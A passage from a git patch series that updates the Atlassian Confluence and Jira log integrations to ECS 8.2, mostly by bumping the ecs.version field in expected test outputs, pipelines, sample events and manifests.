@@ -13107,7 +13107,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.269Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13203,7 +13203,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.267Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13299,7 +13299,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.265Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13388,7 +13388,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.262Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13484,7 +13484,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.259Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13580,7 +13580,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.257Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13676,7 +13676,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.255Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13765,7 +13765,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.253Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13861,7 +13861,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.251Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -13957,7 +13957,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.249Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14046,7 +14046,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.247Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14142,7 +14142,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.245Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14238,7 +14238,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.242Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14327,7 +14327,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.240Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14423,7 +14423,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.238Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14519,7 +14519,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.235Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14608,7 +14608,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.231Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14704,7 +14704,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.219Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14800,7 +14800,7 @@
 },
 "@timestamp": "2021-11-23T00:35:04.192Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -14879,7 +14879,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.950Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -14968,7 +14968,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.924Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -15073,7 +15073,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.860Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -15170,7 +15170,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.253Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15255,7 +15255,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.251Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15340,7 +15340,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.250Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15425,7 +15425,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.246Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15510,7 +15510,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.243Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15595,7 +15595,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.241Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15680,7 +15680,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.239Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15765,7 +15765,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.217Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15838,7 +15838,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.201Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -15914,7 +15914,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.188Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16080,7 +16080,7 @@
 },
 "@timestamp": "2021-11-23T00:35:03.109Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16146,7 +16146,7 @@
 },
 "@timestamp": "2021-11-23T00:34:46.735Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16210,7 +16210,7 @@
 },
 "@timestamp": "2021-11-23T00:34:45.732Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16274,7 +16274,7 @@
 },
 "@timestamp": "2021-11-23T00:34:44.466Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -16348,7 +16348,7 @@
 },
 "@timestamp": "2021-11-28T17:05:37.142Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -16420,7 +16420,7 @@
 },
 "@timestamp": "2021-11-28T17:06:11.805Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -16498,7 +16498,7 @@
 },
 "@timestamp": "2021-11-28T17:05:37.158Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json
index 397384df425..37a34c21b8e 100644
--- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json
+++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json
@@ -22,7 +22,7 @@
 },
 "@timestamp": "2021-11-22T23:42:47.332Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -88,7 +88,7 @@
 },
 "@timestamp": "2021-11-22T23:42:45.791Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -155,7 +155,7 @@
 },
 "@timestamp": "2021-11-22T23:42:49.660Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -313,7 +313,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.440Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -380,7 +380,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.536Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -457,7 +457,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.552Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -546,7 +546,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.592Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -632,7 +632,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.620Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -718,7 +718,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.623Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -804,7 +804,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.627Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -890,7 +890,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.688Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -976,7 +976,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.692Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1062,7 +1062,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.694Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1148,7 +1148,7 @@
 },
 "@timestamp": "2021-11-22T23:43:21.696Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1244,7 +1244,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.540Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -1334,7 +1334,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.147Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -1423,7 +1423,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.172Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -1529,7 +1529,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.401Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1625,7 +1625,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.429Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1715,7 +1715,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.437Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1811,7 +1811,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.442Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1907,7 +1907,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.445Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -1997,7 +1997,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.447Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2093,7 +2093,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.450Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2189,7 +2189,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.454Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2279,7 +2279,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.457Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2375,7 +2375,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.459Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2471,7 +2471,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.462Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2561,7 +2561,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.464Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2657,7 +2657,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.467Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2753,7 +2753,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.470Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2849,7 +2849,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.472Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -2939,7 +2939,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.475Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3035,7 +3035,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.479Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3131,7 +3131,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.481Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3221,7 +3221,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.484Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3317,7 +3317,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.486Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3413,7 +3413,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.489Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3503,7 +3503,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.491Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3599,7 +3599,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.493Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3695,7 +3695,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.496Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3785,7 +3785,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.498Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3881,7 +3881,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.501Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -3977,7 +3977,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.503Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4067,7 +4067,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.506Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4163,7 +4163,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.508Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4259,7 +4259,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.510Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4349,7 +4349,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.513Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4445,7 +4445,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.515Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4541,7 +4541,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.518Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4631,7 +4631,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.520Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4727,7 +4727,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.522Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4823,7 +4823,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.525Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -4913,7 +4913,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.527Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -5009,7 +5009,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.529Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -5105,7 +5105,7 @@
 },
 "@timestamp": "2021-11-22T23:43:22.532Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -5179,7 +5179,7 @@
 }
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -5247,7 +5247,7 @@
 },
 "@timestamp": "2021-11-22T23:44:13.873Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -5329,7 +5329,7 @@
 },
 "@timestamp": "2021-11-22T23:47:20.815Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -5402,7 +5402,7 @@
 },
 "@timestamp": "2021-11-22T23:49:50.382Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
@@ -5497,7 +5497,7 @@
 },
 "@timestamp": "2021-11-22T23:50:13.842Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -5587,7 +5587,7 @@
 },
 "@timestamp": "2021-11-22T23:50:13.966Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -5676,7 +5676,7 @@
 },
 "@timestamp": "2021-11-22T23:50:32.205Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -5774,7 +5774,7 @@
 },
 "@timestamp": "2021-11-22T23:50:35.770Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "hosts": [
diff --git a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml
index 9f11a631a48..2d64b9a828b 100644
--- a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml
@@ -6,7 +6,7 @@ processors:
 value: '{{_ingest.timestamp}}'
 - set:
 field: ecs.version
- value: '8.0.0'
+ value: '8.2.0'
 - rename:
 field: message
 target_field: event.original
diff --git a/packages/atlassian_confluence/data_stream/audit/sample_event.json b/packages/atlassian_confluence/data_stream/audit/sample_event.json
index 1d05591a3e5..9ebea4db129 100644
--- a/packages/atlassian_confluence/data_stream/audit/sample_event.json
+++ b/packages/atlassian_confluence/data_stream/audit/sample_event.json
@@ -45,7 +45,7 @@
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/atlassian_confluence/docs/README.md b/packages/atlassian_confluence/docs/README.md
index 7f66c992099..08a70361423 100644
--- a/packages/atlassian_confluence/docs/README.md
+++ b/packages/atlassian_confluence/docs/README.md
@@ -146,7 +146,7 @@ An example event for `audit` looks as following:
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/atlassian_confluence/manifest.yml b/packages/atlassian_confluence/manifest.yml
index d7d9b8cb7b8..721698bdac0 100644
--- a/packages/atlassian_confluence/manifest.yml
+++ b/packages/atlassian_confluence/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: atlassian_confluence
 title: Atlassian Confluence
-version: 1.1.0
+version: 1.2.0
 license: basic
 description: Collect logs from Atlassian Confluence with Elastic Agent.
 type: integration
From f8279b830ac040bcbefc320cfbef2e523d8d887f Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 22 Feb 2022 12:27:05 -0600
Subject: [PATCH 05/23] Update atlassian_jira to ECS 8.2
---
 packages/atlassian_jira/_dev/build/build.yml | 2 +-
 packages/atlassian_jira/changelog.yml | 5 +
 .../pipeline/test-audit-api.log-expected.json | 196 +++++++++---------
 .../test-audit-files.log-expected.json | 176 ++++++++--------
 .../elasticsearch/ingest_pipeline/default.yml | 2 +-
 .../data_stream/audit/sample_event.json | 2 +-
 packages/atlassian_jira/docs/README.md | 2 +-
 packages/atlassian_jira/manifest.yml | 2 +-
 8 files changed, 196 insertions(+), 191 deletions(-)
diff --git a/packages/atlassian_jira/_dev/build/build.yml b/packages/atlassian_jira/_dev/build/build.yml
index 809e76063e9..d61527283ec 100644
--- a/packages/atlassian_jira/_dev/build/build.yml
+++ b/packages/atlassian_jira/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@8.0
+ reference: git@8.2
diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml
index ce9318cde7a..3857866bdd8 100644
--- a/packages/atlassian_jira/changelog.yml
+++ b/packages/atlassian_jira/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.0"
+ changes:
+ - description: Update to ECS 8.2
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/xxxx
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
index edf3189694f..a683390cf18 100644
--- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
+++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
@@ -3,7 +3,7 @@
 {
 "@timestamp": "2021-11-22T00:34:47.536Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -85,7 +85,7 @@
 {
 "@timestamp": "2021-11-22T00:34:40.008Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -167,7 +167,7 @@
 {
 "@timestamp": "2021-11-22T00:34:23.154Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -237,7 +237,7 @@
 {
 "@timestamp": "2021-11-22T00:32:20.234Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -307,7 +307,7 @@
 {
 "@timestamp": "2021-11-22T00:31:52.991Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -377,7 +377,7 @@
 {
 "@timestamp": "2021-11-22T00:31:37.412Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -447,7 +447,7 @@
 {
 "@timestamp": "2021-11-22T00:31:26.455Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -517,7 +517,7 @@
 {
 "@timestamp": "2021-11-22T00:30:59.449Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -587,7 +587,7 @@
 {
 "@timestamp": "2021-11-22T00:26:03.206Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -657,7 +657,7 @@
 {
 "@timestamp": "2021-11-22T00:12:02.856Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -727,7 +727,7 @@
 {
 "@timestamp": "2021-11-22T00:08:34.545Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -797,7 +797,7 @@
 {
 "@timestamp": "2021-11-22T00:08:34.543Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -872,7 +872,7 @@ { "@timestamp": "2021-11-22T00:08:34.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -935,7 +935,7 @@ { "@timestamp": "2021-11-22T00:08:34.521Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1010,7 +1010,7 @@ { "@timestamp": "2021-11-22T00:08:34.506Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1079,7 +1079,7 @@ { "@timestamp": "2021-11-22T00:08:34.297Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1173,7 +1173,7 @@ { "@timestamp": "2021-11-22T00:08:34.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1236,7 +1236,7 @@ { "@timestamp": "2021-11-22T00:08:34.249Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1305,7 +1305,7 @@ { "@timestamp": "2021-11-22T00:08:34.243Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1374,7 +1374,7 @@ { "@timestamp": "2021-11-22T00:08:34.241Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1443,7 +1443,7 @@ { "@timestamp": "2021-11-22T00:08:34.239Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1512,7 +1512,7 @@ { "@timestamp": "2021-11-22T00:08:34.236Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1581,7 +1581,7 @@ { "@timestamp": "2021-11-22T00:08:34.235Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1650,7 +1650,7 @@ { "@timestamp": "2021-11-22T00:08:34.233Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1719,7 +1719,7 @@ { "@timestamp": "2021-11-22T00:08:34.231Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1793,7 +1793,7 @@ { "@timestamp": "2021-11-22T00:08:34.229Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -1862,7 +1862,7 @@ { "@timestamp": "2021-11-22T00:08:34.227Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1936,7 +1936,7 @@ { "@timestamp": "2021-11-22T00:08:34.225Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2005,7 +2005,7 @@ { "@timestamp": "2021-11-22T00:08:34.223Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2074,7 +2074,7 @@ { "@timestamp": "2021-11-22T00:08:34.221Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2148,7 +2148,7 @@ { "@timestamp": "2021-11-22T00:08:34.219Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2217,7 +2217,7 @@ { "@timestamp": "2021-11-22T00:08:34.217Z", "ecs": { - "version": "8.0.0" + 